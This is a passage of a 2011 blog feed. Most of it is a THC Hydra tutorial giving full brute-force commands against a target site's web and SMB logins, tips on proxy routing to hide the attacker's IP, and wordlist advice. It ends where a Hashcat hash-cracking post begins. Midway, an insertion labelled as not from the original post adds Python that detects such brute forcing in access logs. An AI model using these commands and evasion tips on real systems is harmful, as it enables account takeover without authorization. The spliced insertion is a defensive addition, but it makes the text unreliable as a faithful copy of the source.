Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;the "http-get"&lt;span style="mso-spacerun: yes;"&gt;&amp;nbsp; &lt;/span&gt;defines the method or protocol to use for attacking (see below for full list of protocols)&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpLast" style="margin: 0in 0in 0pt 22.5pt; mso-add-space: auto; mso-list: l0 
level1 lfo2; text-indent: -0.25in;"&gt;&lt;span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;the "-m /" defines where to aim the attempts, i.e. the page to try and crack&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;&lt;span style="mso-no-proof: yes;"&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://img717.imageshack.us/img717/9811/hydra14.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="208" src="http://img717.imageshack.us/img717/9811/hydra14.png" t8="true" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;&lt;br /&gt;
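The http-get run above is, from the router's side, a burst of requests for one path from one client, almost all answered 401 and possibly followed by a 200, and that burst is what a web server's access log should be alerting on. Added example code, not from the original post: a detector for that pattern, run over a constructed access-log sample (the combined log format, the addresses, the 10-failures-per-60-seconds threshold and the assumption that the server logs the attempted username on 401 are all assumptions).

```python
"""Added example (not from the original post): flag HTTP Basic-auth brute
forcing, the trace the Hydra http-get run above leaves in the target web
server's access log.

Assumptions: combined-style access log lines (ip ident user [ts] "req"
status size), a 401 means a rejected credential, and the sample log below
is constructed."""
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone
from operator import ge, gt

LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Parse one access-log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    rec["status"] = int(rec["status"])
    return rec


def find_bruteforce(lines, threshold=10, window=timedelta(seconds=60)):
    """Return one alert per source IP that produced at least `threshold` 401
    responses inside any span of length `window`.  Each alert records the
    peak failure count, the usernames tried, the paths hit, and whether a
    200 followed the failures (a likely successful guess, as in the post)."""
    by_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is not None:
            by_ip[rec["ip"]].append(rec)

    alerts = {}
    for ip, recs in by_ip.items():
        recs.sort(key=lambda r: r["ts"])
        fails = [r for r in recs if r["status"] == 401]
        # Sliding window over the failures: widen `end`, advance `start`
        # while the span exceeds the window, keep the largest span seen.
        peak, start = 0, 0
        for end in range(len(fails)):
            while gt(fails[end]["ts"] - fails[start]["ts"], window):
                start += 1
            peak = max(peak, end - start + 1)
        if not fails or not ge(peak, threshold):
            continue
        last_fail = fails[-1]["ts"]
        success_after = any(
            r["status"] == 200 and ge(r["ts"], last_fail) for r in recs
        )
        alerts[ip] = {
            "max_failures_in_window": peak,
            "users": {r["user"] for r in fails},
            "paths": {r["path"] for r in fails},
            "success_after": success_after,
        }
    return alerts


def build_sample_log():
    """Constructed sample: one client hammers "/" with 12 rejected
    Basic-auth attempts in 12 seconds (the blank and username guesses
    from -e ns first, then wordlist entries), gets a 200 on the 13th,
    while another host browses normally.  Addresses and times are made up."""
    base = datetime(2011, 6, 1, 12, 0, 0, tzinfo=timezone.utc)
    lines = []
    for i in range(12):
        ts = (base + timedelta(seconds=i)).strftime(TS_FMT)
        lines.append(f'192.168.1.50 - admin [{ts}] "GET / HTTP/1.1" 401 381')
    ts = (base + timedelta(seconds=12)).strftime(TS_FMT)
    lines.append(f'192.168.1.50 - admin [{ts}] "GET / HTTP/1.1" 200 2048')
    for i in (5, 40):
        ts = (base + timedelta(seconds=i)).strftime(TS_FMT)
        lines.append(f'192.168.1.20 - - [{ts}] "GET /status.html HTTP/1.1" 200 512')
    return lines


if __name__ == "__main__":
    for ip, info in find_bruteforce(build_sample_log()).items():
        print(ip, info)
```

On the device side the mitigations are the ones the post's own result implies: a non-default admin password, lockout or rate limiting after a handful of failures, and no management interface exposed to untrusted networks.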
&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;&lt;span style="font-family: Calibri;"&gt;You can see above it found the&amp;nbsp;password (&lt;a href="mailto:P@ssword1"&gt;P@ssword1&lt;/a&gt;) for the username admin.&amp;nbsp;You can&amp;nbsp;search the user guide or Google if you need further explanations on how to use it or how to target other protocols, but that should atleast give you enough to get started. I must also note some important pieces of information that you should be aware of when cracking over the network with Hydra. First, if the password is not in your dictionary you will never find it (Period - the end!). Secondly, there are going to be some basic limitations that will impact your time, for example the maximum number of attempts possible per connection, protocol being attacked/used, bandwidth, size of word list and CPU power. These factors can all impact overall time it takes to exhasut all possibilities. The "-t" argument referenced aboved can be used to change the parallel thread count being used to help speed things up, but dont set it too high or will have the reverse affect.&lt;span style="mso-spacerun: yes;"&gt;&amp;nbsp; &lt;/span&gt;Here are some common max limits for attempts per connection, from the tools creators: telnet=4, ftp=6, pop3=1, amd imap=3, and here is the list of all supported protocols (as of the writing of this tutorial) so have fun cracking as the possibilities are limited only by your imagination:&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;&lt;span style="font-family: Calibri;"&gt;&lt;span style="mso-tab-count: 1;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET,&amp;nbsp;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;&lt;span 
style="font-family: Calibri;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET, &lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;&lt;span style="font-family: Calibri;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; HTTPS-FORM-POST,&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;&lt;span style="mso-tab-count: 1;"&gt; &lt;/span&gt;HTTPS-GET, HTTPS-HEAD, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, &lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;&lt;span style="font-family: Calibri;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; NNTP, PCNFS, POP3,&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;&lt;span style="mso-tab-count: 1;"&gt; &lt;/span&gt;POSTGRES, REXEC, SAP/R3, SMB,SMBNT, SMTP, SNMP, SOCKS5,&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;&lt;span style="font-family: Calibri;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; SSH(v1 and v2),&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;&lt;span style="mso-tab-count: 1;"&gt; &lt;/span&gt;Subversion, Teamspeak (TS2), TELNET, VMware-Auth, VNC and XMPP.&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;&lt;span style="font-family: Calibri;"&gt;&lt;span style="mso-tab-count: 1;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;&lt;span style="font-family: Calibri;"&gt;PRO TIP 
#1:&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;&lt;span style="font-family: Calibri;"&gt;A key tip to helping stay secure is to always use a VPN connection when testing to help hide your IP, but Proxies are also a great thing to use. If you need a list of up to date working proxies please see my page dedicated to this here: http://kaoticcreations.blogspot.com/p/free-proxy-list-anonymous-and-elite.html. Once you have identified the proxy you will be using you can incorporate it into THCHydra when testing.&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;&lt;span style="font-family: Calibri;"&gt;&lt;span style="mso-tab-count: 1;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;&lt;span style="font-family: Calibri;"&gt;If you are using the &lt;b style="mso-bidi-font-weight: normal;"&gt;http/www&lt;/b&gt; &lt;b style="mso-bidi-font-weight: normal;"&gt;service&lt;/b&gt; for cracking then you need to use the following argument in your command you are using:&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;&lt;span style="font-family: Calibri;"&gt;&lt;span style="mso-tab-count: 1;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;COMMAND: ./hydra -m /dir/ -l dumbuser -P /path/to/your/passlist www.tagetsite.com http -HYDRA_PROXY_HTTP="http://10.10.10.10:8080/"&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;&lt;span style="font-family: Calibri;"&gt;&lt;span style="mso-tab-count: 2;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;&lt;span style="font-family: Calibri;"&gt;If you are using &lt;b style="mso-bidi-font-weight: normal;"&gt;any other service&lt;/b&gt; for cracking then you will need to use this format instead (very similar but notice the end of the argument changes from HTTP to CONNECT):&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;&lt;span style="font-family: Calibri;"&gt;&lt;span style="mso-tab-count: 1;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;COMMAND: ./hydra -m LH -l dumbuseradmin -P sam.dump www.tagetsite.com smbnt -HYDRA_PROXY_CONNECT="10.10.10.10:8080"&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;&lt;span style="font-family: Calibri;"&gt;If you need to enter credentials to use your proxy then you would add this to the end of either option:&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;&lt;span style="font-family: Calibri;"&gt;&lt;span style="mso-tab-count: 3;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;&lt;span style="font-family: Calibri;"&gt;&lt;span style="mso-tab-count: 1;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;COMMAND: HYDRA_PROXY_AUTH="user:pass"&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;&lt;span style="font-family: Calibri;"&gt;&lt;span style="mso-tab-count: 2;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;COMMAND: ./hydra -m LH -l dumbuseradmin -P sam.dump www.tagetsite.com smbnt -HYDRA_PROXY_CONNECT="10.10.10.10:8080" -HYDRA_PROXY_AUTH="user:pass"&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;&lt;span style="font-family: Calibri;"&gt;PRO TIP#2:&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;&lt;span style="font-family: Calibri;"&gt;A strong word list is also very helpful when it comes to cracking, so try to keep manageable word lists or use tools to help create narrowed down word lists for better, or more targeted, results. THCHydra comes with the PW-INSPECTOR tool which can be used to trim a wordlist down based on password policy or known details. I like to use the word list tools provided by the Hashcat team as well as a tool called Shmoosh2x64.exe. The Hashcat team has a set of tools to help with expanding, sorting, and splitting wordlists and the shmoosh tool helps to combine multiple wordlists while also sorting out duplicates so you get a new wordlist that is full of unique words. I suggest playing with them all as they can all come in handy in various occasions, and all have been documented on their respective sites if you need help with the proper command syntax to use (Google is your friend). If you need to find a good wordlist just search around Google as there are many out there, and I also highly suggest tools like CeWL, CUPP (Common User Passwords Profiler), or WyD (Who's Your Daddy Password Profiler) which can be used to spider sites to help create wordlists based on unique words found on the site that you can then turn around and use to performing bruteforce attacks with (as mentioned above start focused if you can and then broaden your search/attempts to increase your effectiveness). &lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;&lt;span style="font-family: Calibri;"&gt;Hopefully this tutorial has showed you how you can get the latest version of THCHydra working under a Windows 7 environment. This should be another great tool to add to your collection and along with my previous post on the Hashcat tools you should be covered now for all of you password cracking needs, both local and remote. I may cover some word list techniques down the road to complete the series and create a triple threat. I also hope this tutorial helps to ignite some creativity in others to think outside the box for what tools are available to them and how they can be used. &lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;&lt;span style="font-family: Calibri;"&gt;Enjoy, and until next time...&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;&lt;span style="font-family: Calibri;"&gt;H.R.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;strong&gt;&lt;span style="font-family: Calibri;"&gt;UPDATE - &lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;Here is a&amp;nbsp;VIDEO showing how to get XHYDRA working under Backtrack 5:&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;object class="BLOGGER-youtube-video" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0" data-thumbnail-src="http://3.gvt0.com/vi/OErccTu0yqM/0.jpg" height="266" width="320"&gt;&lt;param name="movie" value="http://www.youtube.com/v/OErccTu0yqM&amp;fs=1&amp;source=uds" /&gt;&lt;param name="bgcolor" value="#FFFFFF" /&gt;&lt;embed width="320" height="266"  src="http://www.youtube.com/v/OErccTu0yqM&amp;fs=1&amp;source=uds" type="application/x-shockwave-flash"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8671806905307905831-712616321620587648?l=kaoticcreations.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/cHmt8bgPkgjnawM6T4ApkaVzwlg/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/cHmt8bgPkgjnawM6T4ApkaVzwlg/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/cHmt8bgPkgjnawM6T4ApkaVzwlg/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/cHmt8bgPkgjnawM6T4ApkaVzwlg/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/blogspot/CWtAZ/~4/3wHIoPOJpc8" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://kaoticcreations.blogspot.com/feeds/712616321620587648/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://kaoticcreations.blogspot.com/2011/06/how-to-setup-working-thchydra-and.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/8671806905307905831/posts/default/712616321620587648?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/8671806905307905831/posts/default/712616321620587648?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/blogspot/CWtAZ/~3/3wHIoPOJpc8/how-to-setup-working-thchydra-and.html" title="How to Setup WORKING THCHydra and Cygwin Environment on Windows 7" /><author><name>HR</name><uri>http://www.blogger.com/profile/05957795383670307007</uri><email>noreply@blogger.com</email></author><thr:total>0</thr:total><feedburner:origLink>http://kaoticcreations.blogspot.com/2011/06/how-to-setup-working-thchydra-and.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CEUBQn4yeSp7ImA9WhZaEk0.&quot;"><id>tag:blogger.com,1999:blog-8671806905307905831.post-655439925196301472</id><published>2011-06-04T14:58:00.001-05:00</published><updated>2011-06-27T14:17:33.091-05:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-06-27T14:17:33.091-05:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Hashcat-GUI" /><category scheme="http://www.blogger.com/atom/ns#" term="Hash Cracking" /><category scheme="http://www.blogger.com/atom/ns#" term="Hash Type" /><category 
scheme="http://www.blogger.com/atom/ns#" term="CPU" /><category scheme="http://www.blogger.com/atom/ns#" term="oclHashcat-lite" /><category scheme="http://www.blogger.com/atom/ns#" term="oclHashcat" /><category scheme="http://www.blogger.com/atom/ns#" term="MySQL" /><category scheme="http://www.blogger.com/atom/ns#" term="oclHashcat-plus" /><category scheme="http://www.blogger.com/atom/ns#" term="cudaHashcat" /><category scheme="http://www.blogger.com/atom/ns#" term="cudaHashcat-lite" /><category scheme="http://www.blogger.com/atom/ns#" term="cudaHashcat-plus" /><category scheme="http://www.blogger.com/atom/ns#" term="MD5" /><category scheme="http://www.blogger.com/atom/ns#" term="SHA-1" /><category scheme="http://www.blogger.com/atom/ns#" term="GPU Cracking" /><category scheme="http://www.blogger.com/atom/ns#" term="Password Cracking" /><category scheme="http://www.blogger.com/atom/ns#" term="GPU" /><category scheme="http://www.blogger.com/atom/ns#" term="GUI" /><title>Cracking Password Hashes with CPU &amp; GPU Power</title><content type="html">&lt;div class="MsoNormal" style="margin: 0in 0in 10pt;"&gt;&lt;span style="font-family: Calibri;"&gt;&lt;strong&gt;UPDATE: New video at bottom...&lt;/strong&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-family: Calibri;"&gt;Today I am going to tell you about a kick ass tool for cracking hashes on Windows platform that is capable of leveraging the power of your CPU or even better the power of your GPU(s)...or BOTH. I am even going to use a few pictures for a first, hope you like it. The genius developers behind Hashcat and oclHashcat just released a new version which puts everything in a nice streamlined GUI that is very simple to use and works with both NVidia (CUDA) and ATI (OpenCL) cards, or just plain old CPU power. If you're a console junkie they still have those versions available independently for download as well. You can find them all here: &lt;a href="http://hashcat.net/files/"&gt;http://hashcat.net/files/&lt;/a&gt;. You can choose the one you want from the options on the left, but today I am going to be covering the wonderful new GUI that was just released (hashcat-gui_v0.4.2). I highly suggest you wonder the Hashcat site after you read through this as it is full of knowledge and well written overviews and examples. For now, I will cover some basics...&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 10pt;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 10pt;"&gt;&lt;span style="font-family: Calibri;"&gt;The entire suite of tools together with CPU and GPU is very powerful which helps to exponentially speed up the time to recovery and are capable of cracking the following types of hashes:&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpFirst" style="margin: 0in 0in 0pt 0.5in; mso-add-space: auto; mso-list: l3 level1 lfo4; text-indent: -0.25in;"&gt;&lt;span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;MD5 (and MANY variations)&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="margin: 0in 0in 0pt 0.5in; mso-add-space: auto; mso-list: l3 level1 lfo4; text-indent: -0.25in;"&gt;&lt;span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;SHA1 (and variations)&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="margin: 0in 0in 0pt 0.5in; mso-add-space: auto; mso-list: l3 level1 lfo4; text-indent: -0.25in;"&gt;&lt;span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: 
Calibri;"&gt;MySQL&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="margin: 0in 0in 0pt 0.5in; mso-add-space: auto; mso-list: l3 level1 lfo4; text-indent: -0.25in;"&gt;&lt;span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;SSHA-1&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="margin: 0in 0in 0pt 0.5in; mso-add-space: auto; mso-list: l3 level1 lfo4; text-indent: -0.25in;"&gt;&lt;span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;MD4&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="margin: 0in 0in 0pt 0.5in; mso-add-space: auto; mso-list: l3 level1 lfo4; text-indent: -0.25in;"&gt;&lt;span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;NTLM&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="margin: 0in 0in 0pt 0.5in; mso-add-space: auto; mso-list: l3 level1 lfo4; text-indent: -0.25in;"&gt;&lt;span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font-family: 
